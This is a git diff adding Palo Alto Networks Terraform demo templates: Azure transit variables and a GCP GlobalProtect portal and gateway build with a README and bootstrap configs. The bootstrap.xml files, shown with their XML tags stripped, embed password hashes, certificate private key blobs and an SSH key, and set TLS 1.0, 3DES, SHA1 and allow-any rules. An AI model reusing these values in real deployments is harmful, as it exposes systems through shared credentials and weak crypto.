+spoke_udrs = ["0.0.0.0/0", "10.1.0.0/16", "10.2.0.0/16"]
diff --git a/azure/transit_2fw_2spoke_common_appgw/variables.tf b/azure/transit_2fw_2spoke_common_appgw/variables.tf
new file mode 100644
index 00000000..4899c169
--- /dev/null
+++ b/azure/transit_2fw_2spoke_common_appgw/variables.tf
@@ -0,0 +1,129 @@
+variable location {
+ description = "Enter a location"
+}
+
+variable fw_prefix {
+ description = "Prefix to add to all resources added in the firewall resource group"
+ default = ""
+}
+
+variable fw_license {
+ description = "VM-Series license: byol, bundle1, or bundle2"
+ # default = "byol"
+ # default = "bundle1"
+ # default = "bundle2"
+}
+
+variable global_prefix {
+ description = "Prefix to add to all resource groups created. This is useful to create unique resource groups within a shared Azure subscription"
+}
+#-----------------------------------------------------------------------------------------------------------------
+# Transit VNET variables
+
+variable transit_prefix {
+}
+
+variable transit_vnet_cidr {
+}
+
+variable transit_subnet_names {
+ type = list(string)
+}
+
+variable transit_subnet_cidrs {
+ type = list(string)
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# VM-Series variables
+
+variable fw_count {
+}
+
+variable fw_nsg_prefix {
+}
+
+variable fw_panos {
+}
+
+variable fw_username {
+}
+
+variable fw_password {
+}
+
+variable fw_internal_lb_ip {
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Spoke variables
+
+variable spoke_username {
+}
+
+variable spoke_password {
+}
+
+variable spoke_udrs {
+}
+
+variable spoke1_prefix {
+ description = "Prefix to add to all resources added in spoke1's resource group"
+}
+
+variable spoke1_vm_count {
+}
+
+variable spoke1_vnet_cidr {
+}
+
+variable spoke1_subnet_cidrs {
+ type = list(string)
+}
+
+variable spoke1_internal_lb_ip {
+}
+
+variable spoke2_prefix {
+ description = "Prefix to add to all resources added in spoke2's resource group"
+}
+
+variable spoke2_vm_count {
+}
+
+variable spoke2_vnet_cidr {
+}
+
+variable spoke2_subnet_cidrs {
+ type = list(string)
+}
+
+variable tags {
+ description = "The tags to associate with newly created resources"
+ type = map(string)
+
+ default = {}
+}
+
+#-----------------------------------------------------------------------------------------------------------------
+# Azure environment variables
+
+variable client_id {
+ description = "Azure client ID"
+ default = ""
+}
+
+variable client_secret {
+ description = "Azure client secret"
+ default = ""
+}
+
+variable subscription_id {
+ description = "Azure subscription ID"
+ default = ""
+}
+
+variable tenant_id {
+ description = "Azure tenant ID"
+ default = ""
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/Guide.pdf b/gcp/GP-NoAutoScaling/Guide.pdf
new file mode 100644
index 00000000..8b294c36
Binary files /dev/null and b/gcp/GP-NoAutoScaling/Guide.pdf differ
diff --git a/gcp/GP-NoAutoScaling/README.md b/gcp/GP-NoAutoScaling/README.md
new file mode 100644
index 00000000..e140aa27
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/README.md
@@ -0,0 +1,51 @@
+# GlobalProtect in GCP
+
+Terraform creates a basic GlobalProtect infrastructure consisting of 1 Portal and 2 Gateways (in separate Zones) along with two test Ubuntu servers.
+
+Please see the [**Deployment Guide**](https://github.com/wwce/terraform/blob/master/gcp/GP-NoAutoScaling/GUIDE.pdf) for more information.
+
+
+
+
+
+
+
+## Prerequistes
+* Valid GCP Account with existing project
+* Access to GCP Cloud Terminal or to a machine with a Terraform 12 installation
+
+
+
+## How to Deploy
+### 1. Setup & Download Build
+In your project, open GCP Cloud Terminal and run the following.
+```
+$ gcloud services enable compute.googleapis.com
+$ ssh-keygen -f ~/.ssh/gcp-demo -t rsa -C gcp-demo
+$ git clone https://github.com/wwce/terraform; cd terraform/gcp/GP-NoAutoScaling
+```
+
+### 2. Edit terraform.tfvars
+Open terraform.tfvars and edit variables (lines 1-4) to match your Billing ID, Project Base Name, SSH Key (from step 1), and Region.
+
+
+### 3. Deploy Build
+```
+$ terraform init
+$ terraform apply
+```
+
+
+
+## How to Destroy
+Run the following to destroy the build and remove the SSH key created in step 1.
+```
+$ terraform destroy
+$ rm ~/.ssh/gcp-demo*
+```
+
+
+
+## Support Policy
+The guide in this directory and accompanied files are released under an as-is, best effort, support policy. These scripts should be seen as community supported and Palo Alto Networks will contribute our expertise as and when possible. We do not provide technical support or help in using or troubleshooting the components of the project through our normal support options such as Palo Alto Networks support teams, or ASC (Authorized Support Centers) partners and backline support options. The underlying product used (the VM-Series firewall) by the scripts or templates are still supported, but the support is only for the product functionality and not for help in deploying or using the template or script itself.
+Unless explicitly tagged, all projects or work posted in our GitHub repository (at https://github.com/PaloAltoNetworks) or sites other than our official Downloads page on https://support.paloaltonetworks.com are provided under the best effort policy.
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway.tf b/gcp/GP-NoAutoScaling/bootstrap-gateway.tf
new file mode 100644
index 00000000..d5249b81
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway.tf
@@ -0,0 +1,31 @@
+resource "google_storage_bucket" "gateway_bucket" {
+ name = "gateway-${random_id.random_number.hex}"
+ storage_class = "REGIONAL"
+ location = var.GCP_Region
+ project = google_project.globalprotect.number
+}
+resource "google_storage_bucket_object" "gateway_bootstrap" {
+ name = "config/bootstrap.xml"
+ source = "bootstrap-gateway/bootstrap.xml"
+ bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_init_cfg" {
+ name = "config/init-cfg.txt"
+ source = "bootstrap-gateway/init-cfg.txt"
+ bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_content" {
+ name = "content/null.txt"
+ source = "bootstrap-gateway/null.txt"
+ bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_software" {
+ name = "software/null.txt"
+ source = "bootstrap-gateway/null.txt"
+ bucket = google_storage_bucket.gateway_bucket.name
+}
+resource "google_storage_bucket_object" "gateway_license" {
+ name = "license/null.txt"
+ source = "bootstrap-gateway/null.txt"
+ bucket = google_storage_bucket.gateway_bucket.name
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml b/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml
new file mode 100644
index 00000000..6da28cec
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/bootstrap.xml
@@ -0,0 +1,647 @@
+
+
+
+
+
+
+
+ yes
+
+
+ $1$afhulhyx$P9pkv4/MiYY070qlWmN.v0
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo=
+
+
+
+
+
+
+
+
+
+
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 5
+
+
+ yes
+ 10
+
+
+ yes
+ 5
+
+
+
+ yes
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+ 10
+ 10
+
+ 100
+ 50
+
+
+
+
+
+ 100
+ yes
+
+
+
+
+ a0cb01b7
+ e8d8421e
+ Mar 24 17:02:26 2020 GMT
+ /CN=GP-CA
+ Mar 24 17:02:26 2021 GMT
+ dummy-gw-cert
+ 1616605346
+ no
+ /CN=dummy-gw-cert
+ -----BEGIN CERTIFICATE-----
+MIIDFDCCAfygAwIBAgIFAIsWwrMwDQYJKoZIhvcNAQELBQAwEDEOMAwGA1UEAxMF
+R1AtQ0EwHhcNMjAwMzI0MTcwMjI2WhcNMjEwMzI0MTcwMjI2WjAYMRYwFAYDVQQD
+Ew1kdW1teS1ndy1jZXJ0MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA
+stP0zbfGt7hagWFqN1AD8HsQC1MtPNJRif9TCdskkm15k4nNQmk17ynuXKQNolBB
+hoT+HyUN3AISxJ59QiEuwM0ZSta8PeYrgRSs1fFBWYx1o8Iel9uIGVt+wA81bgau
+fNa1xkKjEDf/9gUoIS/pshitwxzmdp9b5EAgP6AnMfvHQynITzE1hxB9vTh0V8kW
+glQ8H6s0PkxUaLoHmNhjj3Zwcg7FdiIgzJGOKK6fo/89Mc4BnqNLNqlvqzJC5meT
+hdiZFwn/8O9urfKFRp36ZUp+FDHSYIhATiW1MhyiAEfxvjtTeNT9nffhDTC+obJO
+lUSkc3fkuqnQ4pJH/29/LQIDAQABo20wazAJBgNVHRMEAjAAMAsGA1UdDwQEAwID
+uDAnBgNVHSUEIDAeBggrBgEFBQcDAQYIKwYBBQUHAwIGCCsGAQUFBwMFMAkGA1Ud
+IwQCMAAwHQYDVR0OBBYEFD+qH0n0MvDc7amKUccXYBTXYMfMMA0GCSqGSIb3DQEB
+CwUAA4IBAQB3R44cMm/JqxiXoId8/7oFb9WfBrkBV77QXg9aDec34x4PjEYbRpDb
+9S+WFhWAG344MHluqsZuJF8PLtLSruNSfw4wxymMnHTKvn6yUT9o1Kseh/iRtFW4
+Oyog93g29rnqfVnJ1IslkgIdSB+LeW1wjOvIYcAfRQj0qFp4RK9esoJG4vvDTDI5
+BsmRqxR3aa9BY74wZMrnG5xby+Eyfo6RXzmjuR765yRO5HQSGQQhkKa+OhjkXrKA
+KlciqAIoD2NIusdlPUJtlyG0TKgq859+dICv2QTGxvT6YYt0eMR/85q/M1ydEiPd
+G4K6WWOKEwaJ5f9vyjCOTi42OJFzSOZq
+-----END CERTIFICATE-----
+
+ RSA
+ -AQ==upj09hPum45JJ00xXyKBB3Q5ZeY=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
+
+
+ e8d8421e
+ e8d8421e
+ Mar 24 17:00:47 2020 GMT
+ /CN=GP-CA
+ Mar 24 17:00:47 2021 GMT
+ GP-CA
+ 1616605247
+ yes
+ /CN=GP-CA
+ -----BEGIN CERTIFICATE-----
+MIICwDCCAaigAwIBAgIJAMn5gXdRd5x1MA0GCSqGSIb3DQEBCwUAMBAxDjAMBgNV
+BAMTBUdQLUNBMB4XDTIwMDMyNDE3MDA0N1oXDTIxMDMyNDE3MDA0N1owEDEOMAwG
+A1UEAxMFR1AtQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDBGFGm
+/Z+y3AcfqmxOn4RJwF7tA7bh1usgi7nZF5/JELLr0fSXvDqk41pT0Kzm3GWcdZ8b
+4kV1aLNfxWleozPGL4Ezl7z4xkc0kcntK3VpkK4+6/16hZBuQF9roqB0my1HlfRG
+eWBf7bye4ARqmiENuSC5YphS4KJOSoZ4h52hcSsXAcmD+FmtoOtckkvEl5TBhMQX
+Gt4N4FOsuUszQtbql6xNDAFmdXc4YajUVkUM3CRcMTRO+A2YbbRzvwUnGA3wueBb
+1C5JQGHd/lTzbEgTmeRDHvIyx8sruMOuYPQbg8d3JxGT6MZcXRCAJHCpWSXg3WZd
+vBoHuk/ZWNKqdMUPAgMBAAGjHTAbMAwGA1UdEwQFMAMBAf8wCwYDVR0PBAQDAgIE
+MA0GCSqGSIb3DQEBCwUAA4IBAQB+eexIJn99kuJpWAVyh/W+pT1Ah52S8fQi/GJc
+DfxELZqsIg7VkkcZFZJ2aefQpoHp4avKyreUsAG6PnkR9DgNZVBJRe0PDxVf6C+T
+1HvE863NThiRUJi3l1GMaI+xQPKg83ceRsqOAqMzYtf/Xq+/XaawCcBei/9bGqpr
+AJHtvcgiO99yaQnu0hQ5K72Dn0v8ABbF6XyCSSuItdsaltS5XAlHp60+Mcq1R1eh
+n01P4VF6sz5Qsdu49743ja4rd68E/Vd+SQoSroZArOwjLE+dNItiPwgL217HQQqx
+6GgUahzsIr9nAQ59i6s3U4WY2bHZqL94GLdJfTq1dIyktMsz
+-----END CERTIFICATE-----
+
+ RSA
+ -AQ==Lw22pTLfVHUfvaPxm5QAxE/9jX4=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
+
+
+
+
+
+ tls1-0
+ max
+
+ dummy-gw-cert
+
+
+
+
+
+
+
+
+ all
+
+
+
+
+
+
+ $1$dwadmvhu$fzo/POkYDQ/Z/IKyLtmlX.
+
+
+ $1$henwxpvq$KjL6f7B5gjVBDTEDT6pB6/
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+ ping
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+ yes
+ yes
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
+ group19
+
+ 1
+
+
+
+
+
+ aes-256-gcm
+
+
+ none
+
+
+ group20
+
+ 1
+
+
+
+
+
+
+ aes-128-cbc
+
+
+ sha1
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+ 1.25
+ 0.5
+ 900
+ 300
+ 900
+ yes
+
+
+
+
+
+ ethernet1/1
+ tunnel.1
+ ethernet1/2
+
+
+
+
+
+
+
+ ipv4
+ ethernet1/1
+
+
+
+
+ no
+
+
+ tunnel.1
+
+
+
+
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+
+
+ yes
+ yes
+ yes
+ yes
+
+
+ FW-1
+ yes
+
+
+
+ yes
+
+
+ FQDN
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo=
+
+
+ yes
+ yes
+ yes
+ yes
+
+
+ FW-1
+ mgmt-interface-swap
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+
+
+
+
+
+
+ tunnel.1
+
+
+ yes
+
+
+
+
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ ethernet1/1
+
+
+
+
+ untrust
+
+
+ tunnel-zone
+
+
+
+ any
+
+ any
+ no
+
+
+
+
+
+ ethernet1/2
+
+
+
+
+ trust
+
+
+ tunnel-zone
+
+
+
+ any
+
+ any
+
+
+
+
+
+
+
+ untrust
+
+
+ tunnel-zone
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ application-default
+
+
+ any
+
+ allow
+ yes
+ no
+
+
+
+ trust
+
+
+ tunnel-zone
+
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ any
+
+
+ application-default
+
+
+ any
+
+ allow
+
+
+
+
+
+
+
+ ethernet1/1
+ tunnel.1
+ ethernet1/2
+
+
+
+
+
+
+
+
+
+ 30
+
+
+ 3
+
+
+ 180
+
+
+
+
+
+ local
+ Any
+ Enter login credentials
+
+
+ gateway-ssl-tls
+ yes
+
+
+
+
+
+
+ any
+
+
+ any
+
+
+ 192.168.16.10-192.168.16.30
+
+
+ no
+ no
+
+
+ tunnel.1
+
+
+
+
+
+
+
+
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt b/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt
new file mode 100644
index 00000000..3606b11c
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/init-cfg.txt
@@ -0,0 +1,14 @@
+type=dhcp-client
+ip-address=
+default-gateway=
+netmask=
+ipv6-address=
+ipv6-default-gateway=
+hostname=FW-1
+dns-primary=
+dns-secondary=
+op-command-modes=mgmt-interface-swap
+dhcp-send-hostname=yes
+dhcp-send-client-id=yes
+dhcp-accept-server-hostname=yes
+dhcp-accept-server-domain=yes
diff --git a/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt b/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt
new file mode 100644
index 00000000..8b137891
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-gateway/null.txt
@@ -0,0 +1 @@
+
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal.tf b/gcp/GP-NoAutoScaling/bootstrap-portal.tf
new file mode 100644
index 00000000..6f6dbe07
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal.tf
@@ -0,0 +1,31 @@
+resource "google_storage_bucket" "portal_bucket" {
+ name = "portal-${random_id.random_number.hex}"
+ storage_class = "REGIONAL"
+ location = var.GCP_Region
+ project = google_project.globalprotect.number
+}
+resource "google_storage_bucket_object" "portal_bootstrap" {
+ name = "config/bootstrap.xml"
+ source = "bootstrap-portal/bootstrap.xml"
+ bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_init_cfg" {
+ name = "config/init-cfg.txt"
+ source = "bootstrap-portal/init-cfg.txt"
+ bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_content" {
+ name = "content/null.txt"
+ source = "bootstrap-portal/null.txt"
+ bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_software" {
+ name = "software/null.txt"
+ source = "bootstrap-portal/null.txt"
+ bucket = google_storage_bucket.portal_bucket.name
+}
+resource "google_storage_bucket_object" "portal_license" {
+ name = "license/null.txt"
+ source = "bootstrap-portal/null.txt"
+ bucket = google_storage_bucket.portal_bucket.name
+}
\ No newline at end of file
diff --git a/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml b/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml
new file mode 100644
index 00000000..181c989d
--- /dev/null
+++ b/gcp/GP-NoAutoScaling/bootstrap-portal/bootstrap.xml
@@ -0,0 +1,2424 @@
+
+
+
+
+
+
+ updates.paloaltonetworks.com
+
+
+
+
+ wednesday
+ 01:02
+ download-only
+
+
+
+
+ US/Pacific
+
+ yes
+ yes
+
+
+
+ yes
+ yes
+ yes
+ yes
+
+
+ yes
+ FW-1
+
+
+
+ yes
+
+
+ FQDN
+
+ c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFERmRyZmRqUUFSL2NnelVSRTYwLzFKbHFoWXEra3FIeGNxMlpOTTR5VkRobVZ3K2dnUXBxTWQwdG8yRmRZeXV4bUhHdVF4bGFMQkp4UDBtcW5LU3A2eUhqZ2orMTRHK29oYVpKbW5Bd3A2YXVkbXVHVkVEMnliVmZvcGc2dlh3WVdIaFdsSlk3N25ESStxQ1U1blRlMjlZNlpvU29PYmJZWkFqZjY5TXRBUzF2blEwZHduUzk2MEo4ZGdoWjMxK2Z5bTFWdDB5WFlmZ0JPYU4yK0JiK0dRa1dreEQ3UHErUEVYd3EvdysyajZ3d3ZmbEVGQVVkNXNMejh2TzBVMDBEYVZiVFVvMkFoR1VRZndlNVJsTDNTQzdzaTRQdDdYMWVsK2swTW54ZzMyUkt6UFM0ZHd6emYxRklJR2VhYVNnbVFNMGRuQ0hxYjNnMzdzWWpybWFVSGo=
+
+
+ yes
+ yes
+ yes
+ yes
+
+
+ FW-1
+ mgmt-interface-swap
+
+
+
+
+
+
+
+
+
+
+
+
+ no
+
+
+
+
+ no
+
+
+ no
+
+
+
+
+
+
+
+
+
+ 3
+ 5
+ wait-recover
+
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+
+ 8
+
+
+
+
+ aes-128-cbc
+
+
+ sha256
+
+
+ group19
+
+
+ 8
+
+
+
+
+ aes-256-cbc
+
+
+ sha384
+
+
+ group20
+
+
+ 8
+
+
+
+
+
+
+
+ aes-128-cbc
+ 3des
+
+
+ sha1
+
+
+ group2
+
+ 1
+
+
+
+
+
+ aes-128-gcm
+
+
+ none
+
+
